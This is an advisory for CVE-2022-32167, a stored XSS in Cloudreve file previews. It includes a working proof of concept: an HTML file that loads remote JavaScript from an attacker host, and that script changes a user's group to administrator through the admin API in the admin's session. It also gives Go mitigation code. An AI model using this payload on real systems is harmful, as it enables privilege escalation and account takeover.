CVE-2022-32167

Date: September 20, 2022

Overview

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS) via the file upload functionality. A low-privileged user can share an uploaded file with an admin user, which can lead to privilege escalation.

Details

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to Stored Cross-Site Scripting (XSS): when an attacker uploads a malicious HTML file containing JavaScript, the file is stored as uploaded, and when an admin user previews it the script executes in the admin's browser, running with admin privileges.

PoC Details

Access the application and create a low-privileged user account from an admin user. Then, as the newly created user, upload the malicious HTML file containing the JavaScript shown under "PoC Code". Create a preview share link and share it with the admin user. Once the admin user accesses the preview link, the XSS triggers and the low-privileged user is granted the Administrator role.

PoC Code

XSS Payload Inside safe.html:

<script src=http://0.0.0.0:2222/lpeexploit.js></script>


JS Code Inside lpeexploit.js:

// Read the target user's record from the admin API (runs in the admin's browser session)
fetch("http://localhost:5212/api/v3/admin/user/2")
  .then(response => response.text())
  .then(data => {
    var post = JSON.parse(data);
    // Strip the response envelope and move the user object under "user"
    delete post.code;
    delete post.msg;
    post.user = post.data;
    delete post.data;
    var post2 = post.user;
    // Change the user's group to the administrator group
    post2['GroupID'] = 1;
    var post_data = JSON.stringify(post);
    // Write the modified record back through the admin API
    fetch("http://localhost:5212/api/v3/admin/user", {
      headers: {
        'Accept': 'application/json, text/plain, */*',
        'Content-Type': 'application/json',
      },
      method: "POST",
      body: post_data
    });
  });

Affected Environments

3.0.0-beta1 through 3.5.3

Prevention

No fix.
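Since no upstream fix is listed, the following is an added mitigation example (not Cloudreve's code and not a patch the project has published) showing the defensive pattern that breaks this class of stored XSS: a Go handler for a hypothetical preview endpoint that never renders HTML-like uploads inline. Active content types are delivered as downloads, the declared type is pinned with nosniff so the browser cannot sniff them back into HTML, and a CSP sandbox denies script execution and same-origin access as a second layer. The in-memory file store, the /preview/ path and the sample files are constructed for the example.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"path"
	"strings"
)

// Policy is the set of response headers the preview endpoint applies to one file.
type Policy struct {
	ContentType string
	Disposition string
	CSP         string
}

// activeContent lists extensions a browser would render as a document that can
// run or load script from the application's own origin.
var activeContent = map[string]bool{
	".html": true, ".htm": true, ".xhtml": true, ".svg": true, ".xml": true, ".mht": true,
}

// attachment builds a Content-Disposition value that forces a download; the
// filename is quoted/encoded by the mime package, with a plain fallback if the
// name cannot be represented.
func attachment(name string) string {
	if v := mime.FormatMediaType("attachment", map[string]string{"filename": path.Base(name)}); v != "" {
		return v
	}
	return "attachment"
}

// previewPolicy decides how an uploaded file may be shown. HTML-like files are
// forced to download as octet-stream; only a fixed, non-executable type is ever
// served inline. The CSP sandbox is belt-and-braces: if a file is rendered
// anyway, script execution and same-origin access are still denied.
func previewPolicy(name string) Policy {
	ext := strings.ToLower(path.Ext(name))
	p := Policy{CSP: "sandbox; default-src 'none'"}
	switch {
	case activeContent[ext]:
		p.ContentType = "application/octet-stream"
		p.Disposition = attachment(name)
	case ext == ".txt" || ext == ".md" || ext == ".log":
		p.ContentType = "text/plain; charset=utf-8"
		p.Disposition = "inline"
	case ext == ".png" || ext == ".jpg" || ext == ".jpeg" || ext == ".gif":
		p.ContentType = mime.TypeByExtension(ext)
		p.Disposition = "inline"
	default:
		p.ContentType = "application/octet-stream"
		p.Disposition = attachment(name)
	}
	return p
}

// previewHandler serves files from an in-memory store (a constructed stand-in
// for a real upload store) under the computed policy.
func previewHandler(files map[string][]byte) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		name := path.Base(r.URL.Path)
		body, ok := files[name]
		if !ok {
			http.NotFound(w, r)
			return
		}
		p := previewPolicy(name)
		h := w.Header()
		h.Set("Content-Type", p.ContentType)
		h.Set("Content-Disposition", p.Disposition)
		h.Set("Content-Security-Policy", p.CSP)
		h.Set("X-Content-Type-Options", "nosniff") // never sniff octet-stream back into HTML
		w.WriteHeader(http.StatusOK)
		_, _ = w.Write(body)
	})
}

// previewHeaders runs one request through the handler and returns the response
// headers, so the effect of the policy can be checked without a real server.
func previewHeaders(files map[string][]byte, name string) http.Header {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodGet, "/preview/"+name, nil)
	previewHandler(files).ServeHTTP(rec, req)
	return rec.Result().Header
}

func main() {
	// Constructed sample uploads: an HTML file carrying a script tag, and a text file.
	files := map[string][]byte{
		"safe.html": []byte(`<script>document.title = "x"</script>`),
		"notes.txt": []byte("plain notes"),
	}
	for _, n := range []string{"safe.html", "notes.txt"} {
		h := previewHeaders(files, n)
		fmt.Printf("%s: %s | %s | %s\n", n, h.Get("Content-Type"), h.Get("Content-Disposition"), h.Get("Content-Security-Policy"))
	}
}
```

The key design choice is that the allow-list decides what is served inline, not a deny-list of dangerous extensions: anything unknown falls through to a download. Serving the preview from a separate, cookie-less origin would remove the remaining risk entirely, since a script that does run there cannot reach the admin API with the admin's session.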

Language: Go

Good to know:

Cross-Site Scripting (XSS)

CWE-79
Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None